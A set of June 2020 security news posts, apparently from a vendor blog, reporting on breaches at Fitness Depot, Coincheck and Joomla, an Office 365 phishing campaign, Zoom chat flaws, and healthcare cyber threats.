Month: June 2020

As Covid-19 spread across the world, opportunities to exercise outdoors became limited for most people. Workout routines quickly shifted online, and with gyms now closed, online sales of fitness equipment skyrocketed 55% between January and March 2020.

The newest addition to the data breach ‘wall of shame’ is none other than Fitness Depot, Canada’s largest fitness equipment retailer. Recently, the company started informing its customer database about a security incident that led to the exposure of customers’ names, home addresses, email addresses, telephone numbers, and numbers of credit cards used in transactions.

“Cyber criminals may have accessed and or removed personal information relating to certain individuals who made purchases for delivery and or who made purchases for in-store pick up at one of our retail locations,” Fitness Depot said in a data breach notification letter sent to affected shoppers.

The data breach, dated back to February 18, began with the injections of a malicious form on the company website, a clear sign of a Magecart-style attack. Web Skimming attacks are designed to steal payment and personal information.

“Cyber criminals were able to place a form on our Fitness Depot website that was misleading,” the company said. “Once our customers were redirected to this form the customer information was copied without the authorization or knowledge of Fitness Depot. This is how the personal information was captured and stolen.”

It took the company just over 3 months to discover the incident, as their notification clearly points out.

“On May 22nd, 2020 Fitness Depot was informed of a potential data breach on transactions involving our Ecommerce operations. Fitness Depot immediately shut down this service and launched an investigation,” the letter reads.

The vendor is now pointing fingers at its Internet Service Provider (ISP), who apparently “neglected to activate the anti-virus software” on their account. While their statement leaves plenty of room for debate, additional questions regarding the number of impacted customers and potential assistance for affected customers remain — no credit monitoring services were provided for shoppers. The company warns of potential fraud and identity theft incidents, and advises customers to review account statements regularly.

“As of this writing of this notification, Fitness Depot has no knowledge that any of our customer information was compromised in any manner,” the company said. “If you feel that your personal customer information was in fact compromised in any way, please let us know immediately.”

The retailer also mentioned that their security measures have now removed the cyber thieves’ access to their online systems, but said they will continue to monitor for any signs of unauthorized activity on their e-commerce platform.

As the world switched to even more online shopping, cybercriminals were not on holiday. They quickly exploited the uptick in e-commerce, deploying targeted attacks on multiple platforms to steal personal and financial information of customers. No stone was left unturned, and cybercrime continues to flourish in the underbelly created by the coronavirus pandemic.

A phishing attack is using VPN impersonation to trick
people into revealing their Microsoft Office 365 credentials.

With so many people working from home, VPN use has
increased considerably. Most companies rely on this sort of technology to let employees
connect to the corporate infrastructure safely, so it stands to reason that bad
actors would seek to use it as an attack vector.

Microsoft Office 365 credentials are highly valued on the
dark web because, in the right circumstances, they can give attackers a way
into a company’s network that doesn’t require too much effort. Defense systems
would have a hard time identifying a hacker who’s using legitimated
credentials.

“The attack impersonates a notification email from the IT
support at the recipients’ company,” reads the advisory
from the Abnormal Security.

“The sender email address is spoofed to impersonate the
domain of the targets’ respective organizations. The link provided in the email
allegedly directs to a new VPN configuration for home access. Though the link
appears to be related to the target’s company, the hyperlink actually directs
to an Office 365 credential phishing website,” the advisory continues.

While the attack seems to originate from numerous IPs and
different senders, the payload in each email was identical, which means they’re
all part of the same campaign.

According to the researchers, the landing page of the
phishing attack was displayed if the victim believed the message was hosted on
Microsoft .NET platform, and it’s identical to the Office 365 login website.
Since it’s hosted on a Microsoft platform, the certificate is also legit.

As usual, people should not open emails from unknown
senders, and they should be wary of any messages requesting changes of
passwords, confirmation of credentials, or anything else that might lead to a
leak of secure login credentials.

Recent spikes in cyber-attacks have provoked heated reaction from governments around the world. Nation-state hackers are targeting medical facilities, government agencies and critical infrastructure in their attempts to disrupt business operation, gain intelligence and inflict revenue losses.

Our increased dependency on cyberspace has brought new risks, and the evolution of the threat landscape has become more dangerous.

In an attempt to protect critical systems and networks of Royal Navy and Air Force, the UK Armed Forces has just announced the launch of a specialized Cyber Regiment, formally christened at a ceremony in Blandford on June 1.

“As the character of warfare evolves, and the weapons used to fight those wars shift from the industrial to the information age, digital and cyber capabilities are increasingly relied upon to ensure the nation’s security and the safety of our personnel overseas,” reads the Ministry of Defense (Mod) press release.

Part of the Army’s push to improve its response to the surge of digital threats, the 13th Signal Regiment consists of 250 men and women dedicated to the UK’s defensive cyber capabilities.

“The regiment will consist of several Cyber Protection Teams as well as technical staff who will secure the cyber domain for troops deployed on military operations,” said MoD officials.

The MoD pledged an investment of over £22 million in the center that will house the new cyber unit, with “personnel from 15 different cap badges represented in the first intake, plus specialist Royal Navy and RAF personnel.”

This is a step-change in the modernisation of the UK Armed Forces for information warfare,” Defence Secretary Ben Wallace said. “Cyber-attacks are every bit as deadly as those faced on the physical battlefield, so we must prepare to defend ourselves from all those who would do us harm and 13th Signal Regiment is a vital addition to that defence.”

It’s become vital for governments to step up their game in cyber-warfare, and the recent launch of the specialized regiment is expected to safeguard crucial military infrastructure against digital threats that could potentially cripple military operations and leak sensitive data.

Cybercriminals
exposed more than 5 billion records in 2019, costing US organizations over $1.2
trillion, according to a new report. Healthcare was the most targeted industry last
year and remains an active target in 2020, accounting for 51% of incidents in
Q1 – likely fueled by the COVID-19 pandemic.

Researchers are noticing a sharp increase in costs related to data breaches. While the 2.8 billion records exposed in 2018 cost organizations more than $654 billion, the over 5 billion records exposed in 2019 cost $1.2 billion. This lifts the total cost from data breaches to over $1.8 trillion in two years, according to digital identity firm ForgeRock.

Breaches
have increased dramatically, both in actual numbers and costs, with healthcare
emerging as the most targeted industry in 2019, accounting for 382 breaches and
over $2.45 billion in costs. Medical records were the most sought-after type of
PII in Q1 2020, accounting for 25% of all exposed data. These findings are
consistent with other reports tracking attacks on healthcare institutions.

A CBC Canada report revealed this week that medical records can fetch up to $200 on the dark web as they give malicious actors immense leverage in fraud campaigns. One expert cited in the CBC piece opined that healthcare in Canada is 20 years behind banks when it comes to cyber-hygiene. ForgeRock researchers further note that technology firms had the highest number of records compromised by breaches, with over 1.37 billion exposed.

According to
the report, unauthorized access was the most common attack vector used in 2019,
responsible for 40% of breaches, followed by ransomware and malware at 15% and
phishing at 14%.

Personally
identifiable information (PII) as defined by new legislature (i.e. GDPR)
remained the most targeted data by attackers and was exposed in 98% of 2019
breaches, up from 97% in 2018.

“By
targeting PII and leveraging unauthorized access, cybercriminals highlight how
weaknesses in enterprises’ identity and access management practices
increasingly allow for greater volumes and more sensitive types of data to be
pilfered,” researchers stressed.

Banking/insurance/financial
came second after healthcare, accounting for 12% of all breaches. Education
followed, at 7%, then government and retail, each with a 5% share.

Researchers
say 2020 is set to outpace last year in terms of records breached, even though
the number of individual incidents has dropped by 57%. And healthcare breaches
will likely dominate, driven by fraudulent COVID-19 campaigns geared towards
medical institutions and unwary members of the public.

Bitdefender’s own researchers in Q1 2020 found that the number of global cyberattacks targeting hospitals in March increased by almost 60% from February. According to our data over the past 12 months, this marked the highest spike in our global evolution of cyberattacks detected at hospitals.

Security researchers found a couple of vulnerabilities
affecting the chat features of the popular video conferencing app Zoom that, if
exploited, would have let attackers achieve arbitrary code execution.

While the mere mention of Zoom makes people think of
video conferencing, the application has a number of other features that can harbor
vulnerabilities. In fact, a couple of critical flaws were identified by Cisco
researchers in the Chat feature; either would have been enough to give
attackers a way to execute code remotely.

The first one, dubbed CVE-2020-6109, is an exploitable
path traversal vulnerability affecting how the application processes animated
GIFs.

“Only Giphy servers were originally supposed to be
used for this feature in Zoom,” reads the advisory.
“However, the content from an arbitrary server would be loaded in this
case, which could be abused to further leak information or abuse other
vulnerabilities.”

The second was an exploitable path traversal
vulnerability that affected how code snippets are shared by generating a
special zip archive.

“Zoom’s chat functionality is built on top of XMPP
standard with additional extensions to support rich user experience,” say the
researchers. “One of those extensions supports a feature of including source
code snippets that have full syntax highlighting support. The feature to send
code snippets requires installation of an additional plugin, but receiving them
does not.”

The vulnerabilities affected the Zoom Client version
4.6.10. A patch correcting the problems has been issued already.

The company also announced
a new policy when it comes to encrypting sessions, explaining that, basically,
end-to-end encryption will be a feature available for paid accounts, companies,
and educational entities using the platform.

The company determined that most of the abuse, such as
zoom-bombing, for example, comes from users with free accounts. By not
providing them with complete end-to-end encryption, it makes it easier for law
enforcement and their own teams to investigate any incidents.

Researchers from Carnegie Mellon University published a
paper about people’s behavior after their passwords were compromised in a data
breach, and the results are as bad as you can imagine.

One thing that becomes painfully obvious, especially for
cybersecurity companies, is people’s unrivalled complacency when it comes to
password management. A robust security solution can be undone by a single user who
decides to continue using the one password common to all his active online
resources.

The study looked at the effectiveness of password-related
breach notifications and practices enforced after a breach. The most
significant difference is that this is not a survey, which means that the data
should be more valuable and precise. Information from 249 participants was used
to check how people changed their password following a data breach.

Out of 249 participants, 63 had accounts on breached
domains. Only 33% of the 63 went on to change their passwords, and only 13% did
so within three months of the announcement. Furthermore, most of them used
similar or even weaker passwords.

Also, 21 of the 63 people affected changed passwords
immediately after the breach announcement, but the quality of the new passwords
left much to be desired. The same people also had, on average, 30 other
passwords that were similar to the breached password.

Over the course of two years, 223 of the 249 participants
changed their passwords, and 70% of these password changes resulted in passwords
that were weaker or no stronger.

“Even when they changed their password on a breached
domain, most participants changed them to weaker or equally strong
passwords,” states the study.
“And, regardless of whether participants changed their similar passwords
within a month of the first change, their new passwords on the breached domains
were on average more similar to their remaining passwords,” continues.

The study concludes that password breach notifications
are failing dramatically. They don’t seem to prompt people to change passwords
in sufficient numbers, and the ones that do choose similar passwords.
Regulators should incentivize companies to use multi-factor authentication and
to hash and salt passwords to avoid credential-stuffing and rainbow-table
attacks on plaintext.

Japanese cryptocurrency exchange Coincheck has announced that earlier this week hackers managed to access some emails sent to the firm by its customers.

Reading (with a little help from Google Translate) press announcement, it appears an attacker accessed the DNS records for the coincheck.com domain at the firm’s third-party domain registrar, and was able to change the records to forward incoming emails to the hackers.

As a result of this event, some emails the cryptocurrency exchange received between May 31 to June 1 could be illegally accessed by an unauthorised party. Clearly such emails would contain the sender’s email address (which could later be abused by criminals), but Coincheck warned that they could also include the following personal information:

• Name
• Registered address
• Date of birth
• Phone number
• ID Selfie

In all, the cryptocurrency exchange believes that around 200 customers had their emails exposed by the incident.

Coincheck says that the domain records have now been amended, and says it has asked its domain registrar to investigate what went wrong, and how a hacker might have been able to access the account.

Questions I would be asking is whether Coincheck was using a unique, hard-to-crack password to secure its account at the domain registrar. But even a good strong password can still be phished.

For that reason I would like to believe that Coincheck was further securing its domain registrar account (and the critical DNS records it manages) with two-factor authentication.

Unfortunately, not all domain registrars support 2FA – something which has caught out companies in the past.

Past victims of DNS hacking have included WhatsApp, Lenovo, and Bitcoin wallet service Blockchain.info.

Coincheck itself is no stranger for being on the receiving end of unwanted attention from hackers. In January 2018 the cryptocurrency exchange suffered a massive hack which saw it lose more than $500 million worth of digital coins.

Hospitals
and clinics in Canada can’t cope with growing cyber threats amid the COVID-19
pandemic, say healthcare and cybersecurity professionals. The reason?
Healthcare institutions spend a bare minimum on IT, putting every dollar to
front-line care services. Criminals know this – and are increasingly exploiting
it.

A CBC Canada report reveals that the country’s health system has been under siege from cybercriminals trying to steal patient information and other data in recent years.

The report
highlights several recent incidents, including last year’s hit on LifeLabs, a
Canadian diagnostic and specialty testing company, ransomware attacks on three
Ontario hospitals in October, the hack of eHealth Saskatchewan earlier this
year, and an incident at a medical center in Nova Scotia that exposed
personally identifiable information about surgeries.

With
cybersecurity incidents growing in number, the federal government’s Canadian
Centre for Cybersecurity warned health organizations involved in the national
response to COVID-19 to watch out for cyber-attacks, including ransomware and “sophisticated
threat actors” that may try to steal intellectual property related to
COVID-19 research and development.

Even if they
take the alert seriously, medical institutions have a very big problem on their
hands: no money to hire skilled IT personnel or to buy cyber-safeguards. All
while medical records fetch up to $200 on the dark web because they give
malicious actors immense leverage in fraud campaigns.

The CBC report
aggregates expert opinions, including one from Raheel Qureshi, co-founder of a
cybersecurity consulting firm that deals with hundreds of health organizations across
the country. Qureshi says the healthcare sector is targeted more than any other
industry in Canada, accounting for 48 per cent of all security breaches in the
country last year. Most notably, he had the following to say about hospitals in
the context of cybersecurity:

“A lot
of health-care organizations are still in the middle of some kind of security
road map, or they’re starting the conversation now to understand, ‘What do we
need to do?’ Banks started doing this 15, 20 years ago.”

And it’s
true. A hospital is the last place you’ll find a team of IT gurus trained in
cybersecurity matters, yet hospitals need these resources now more than ever.

And it’s not
just Canada that needs to up the ante in the cybersecurity department. Hospitals
and healthcare facilities around the world are prime targets of a wave of
cyberattacks, including ransomware attacks, Bitdefender telemetry shows.

We’ve also seen the number of cyberattacks and ransomware incidents directly targeting healthcare increase significantly over the past couple of months. For instance, the number of global cyberattacks targeting hospitals in March increased by almost 60 percent from February, marking the highest spike in our global evolution of cyberattacks detected at hospitals over the past 12 months. Learn more in the Bitdefender Labs research, “Global Ransomware and Cyberattacks on Healthcare Spike during Pandemic.”

Mobile apps dropped by developers and removed from
official stores remain a security issue because many people continue to use
them daily, according to new research from Wandera.

Not all mobile apps are around forever. Popular and
useful apps disappear from official stores all the time. The reasons are not
always the same; developers drop support, companies go under, and so on. Even
if an app is removed from the store, though, it’s not necessarily removed from
the phone. Developers don’t have the power (nor should they) to remove apps
remotely.

People will continue to use apps until they don’t work,
especially if they are useful. In this case, security becomes a significant
problem as applications with vulnerabilities remain in use long after they’ve
been retired.

A report from Wandera
shows that Productivity apps seem to be the most commonly abandoned, as they
account for 38.7% of the total. Next comes Gaming and Entertainment (30.3%),
Lifestyle (14.1%), Video and Photo 10.6%, and Communication 6.3%.

You might be inclined to believe large companies don’t
abandon their apps, but that’s not the case. In fact, some of the most prolific
apps that have long been absent from official stores but are still in use come
from major companies.

Some of the best-known apps includes Samsung Keyboard,
SideSync, S Note, Google Now Launcher, and the ES File Explorer. Not everyone
is quick to replace an old phone, so people don’t have an incentive to replace
an app that works, not knowing that they might expose themselves to online
risks.

As the report underlines, the most relevant example is
the Samsung Keyboard, which has at least one known vulnerability. Users need to
be aware that not all of their applications are still supported, and they should
always install a security solution that might help mitigate some of the
problems that might arise.

A data breach affecting Joomla, the popular open-source
content management system (CMS), was announced by its developers from Open
Source Matters.

While some data breaches take place when bad actors use
vulnerabilities or cyberattacks, that’s not always the case. Human error is a quite
often a cause, as was the case in the latest Joomla data breach.

An investigation is still underway, but it looks like the
data breach took place due to improper cybersecurity hygiene. The Joomla
developers posted all the information they had about the incident, including
details of the compromised data.

“JRD full site backups (unencrypted) were stored in a
third-party company Amazon Web Services S3 bucket,” reads the statement
from the developers.

“The third-party company is owned by a former Team
Leader, still Member of the JRD team at the time of the breach,” it said. “Each
backup copy included a full copy of the website, including all the data. Most
of the data was public, since users submitted their data with the intent of
being included into a public directory. Private data (unpublished, unapproved
listings, tickets) was included in the breach.”

The incident was discovered during a security audit that
also revealed the presence of Super User accounts owned by individuals outside
Open Source Matters.

A total of 2,700 people were affected by the data breach.
The leaked information included the full name, the business address, business
phone number, the company URL, the type of business, the encrypted passwords (hashed),
the IP address, and the new subscription preferences.

It’s still unclear whether the data was just exposed,
without being accessed by third parties. In any case, all users of Joomla
Resources Directory are advised to change their passwords as soon as possible,
especially since it’s possible that the same combination of credentials might
have been used on other online services as well.